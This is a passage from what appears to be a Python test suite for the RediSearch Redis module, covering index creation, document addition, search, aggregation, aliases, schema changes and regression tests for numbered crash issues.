cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note: the document needs at least one sortable field present in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
    # Test the constraints for the ALTER command
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
    # Adding one more field should now be too many
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
        pass  # just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
        pass  # just ensure it doesn't crash
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
    # index list should be cleared now. This can be tested by trying to alias
    # the old alias to a different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
    # check that aliasing one alias to another returns an error, since chained
    # aliases would end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
r = env.cmd('ft.del', 'myIndex', 'doc2')
env.assertEqual(1, r)
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
# We cannot reliably determine that any error will occur in cluster mode
# because of the key name
env.skipOnCluster()
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
    # get the maximum number of expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
    tmax = time.time() + 0.5  # 500ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
    print('did {} iterations'.format(iters))
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
    print(env.cmd('ft.explain', 'idx', '(~@t1:word20)'))
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
print(r)
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
rv = env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertEqual([1L, 'doc1', None, ['test', 'foo']], rv)
def testIssue_884(env):
env.expect('FT.create', 'idx', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
env.expect('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}').equal(
[2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']])
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc2', ['test2', 'bar', 'test1', 'foo'], 'doc1', ['test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
